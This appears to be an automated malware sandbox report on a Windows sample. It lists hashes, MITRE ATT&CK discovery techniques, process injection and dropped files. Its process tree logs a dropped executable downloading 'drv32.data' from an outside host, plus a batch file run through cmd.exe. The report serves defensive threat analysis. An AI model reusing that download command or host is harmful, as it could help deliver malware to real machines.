55379b0f04deadfa850caad6bbe22ef833adac58fa4f7ad61fcdb31d72a050bb

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2024 06:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe
Size

97KB
MD5

eac64ed3a56ed6bfaebfa847736b9c8b
SHA1

d606de34808b88b4975d0c28d7faa1f9c9d8e912
SHA256

55379b0f04deadfa850caad6bbe22ef833adac58fa4f7ad61fcdb31d72a050bb
SHA512

1186668a43561739692de08c933b3fe2aec3745f03c87e5a8f90831d69d6f02be04617e5961ed2e9ceb91b00528d8f1d325a3f426813cd67d526847c6786205a
SSDEEP

1536:pu3dzAzeIGy7bJ3GkZSnUgidUbarSu2A184HlkL6XgsAuryTUgXuHAQc1zCXdW:puNzePR3romdzH1XgU1gXQAqs

Score

7^/10

discovery

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe

Executes dropped EXE 1 IoCs

pid	Process
1684	G786D-tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	G786D-tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4092 wrote to memory of 1684	4092	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	82
PID 4092 wrote to memory of 1684	4092	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	82
PID 4092 wrote to memory of 1684	4092	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	82
PID 4092 wrote to memory of 2432	4092	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	83
PID 4092 wrote to memory of 2432	4092	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	83
PID 4092 wrote to memory of 2432	4092	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	83

C:\Users\Admin\AppData\Local\Temp\eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4092
- C:\Users\Admin\AppData\Local\Temp\G786D-tmp.exe
  C:\Users\Admin\AppData\Local\Temp\G786D-tmp.exe http://creatonsoft.com/drv32.data "C:\Users\Admin\AppData\Local\Temp\G786E-tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\tmp.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6809OHQ0\A89MW3VJ.htm

Filesize
1.6MB

MD5
b62da1e59e8cc8d7941b52a51317f3aa

SHA1
a184a0b21025d21300ea7ad4f7b1e694a0f97938

SHA256
5082e16f4d7e7e3d53f5fce8afbfc5a95ac5680bc8dac07e3ca02018050ef87e

SHA512
50a604857a74e2a1a9ff78401114dba1e0f5bd62bec9992ac3cb94d087be56a720b95e110b2b13a4b09b8290fd8d2a56e63b04b17feb1420ac27434c7ea74a15

Download Submit
C:\Users\Admin\AppData\Local\Temp\G786D-tmp

Filesize
104KB

MD5
53c0d4521d6e9cf8712824d577f8fb92

SHA1
a788a8b06061d46d8ea391028bd918e8ef5a744a

SHA256
ce37879a283050b4c482ae7a4071eb4633a55851e1f527716f482f88c976ba93

SHA512
4f3827e6182791bba8301024f16e146e3b0d597228c5b25cecd05be7684c55d72ebd1e4e8cd3a958b49eadacf77f8c0dadcd9306e84b33074942f907daaaf5b7

Download Submit
C:\tmp.bat

Filesize
50B

MD5
763fa368cee30386b6dbfc6360778e62

SHA1
28ea52f4b0f548fa31719a01bcb0ec3650674991

SHA256
e194c8ad290efc9931a7e14d5b5b9ad5259552508615f1561266280aea765fee

SHA512
3e559abeae745f44e68ee85de319c153cf60897c33dad84761bc1d4bf2ed7c085e8014cca42e32767bacd0ec02c0da7588192ce5da0ba1b97d32e1914c1ef368

Download Submit
memory/1684-29-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4092-0-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download
memory/4092-34-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download